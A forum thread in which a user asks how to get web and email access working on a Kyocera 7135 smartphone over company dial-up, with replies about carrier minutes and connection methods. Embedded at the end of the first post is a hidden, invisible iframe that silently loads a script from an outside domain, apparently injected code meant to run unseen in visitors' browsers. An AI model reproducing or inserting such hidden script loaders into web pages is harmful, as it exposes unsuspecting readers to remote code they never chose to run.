7135 Web access

Newbie to this board, but on my 2nd 7135. Company switched carriers, so I tried a I-700. Hated it. Very clunky IMO.

Glad to have my 7135 back. Never tried to set up web access, so here goes...

Can I use my companies dial up settings to access the web without paying for web service from Verizon? I will be burning minutes.
I fiddled w/ the settings and established a connection it seems with our T1 using dial up as I do w/ laptop.
Can't get either browser to open though.
EIS says "no site found" no matter what site I try.

Openwave says security not set up, when I try, it says security key invalid.

Any help appreciated,

Love the 7135.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You can't avoid using minutes. You'll still be connecting using the carrier's network. Hopefully you have unlimited N&W... then during those times you don't have to worry about minutes

Thanks Robert,

No worries at all there, as the plan covers it.

Any help with the basic question?

Should I be able to use the internal modem to access the internet with the 7135?

Why can't I get the browser(s) to open?

I use the 7135 everyday to keep well organized, I would really like to get the web access up, as I log in to an MS exchange server for company email, and I just need to know if that is possible in the manner I'm describing.

I realize this may be a really stupid question, but I.m sure I can get an answer here quicker than form my IT Dept.

Thanks!

You mean, you'd like to use your ISP's dial-up?

This is entirely possible. But it's pointless since it won't be faster than the 14.4k the Quick2Net offers. If you're trying to dial in to your service for VPN purposes or what-not, then I can see what you're talking about.

Anyway... I don't believe you can do it without the sync cable. But in any case, when I get home I'll see if I can remember how I did it.
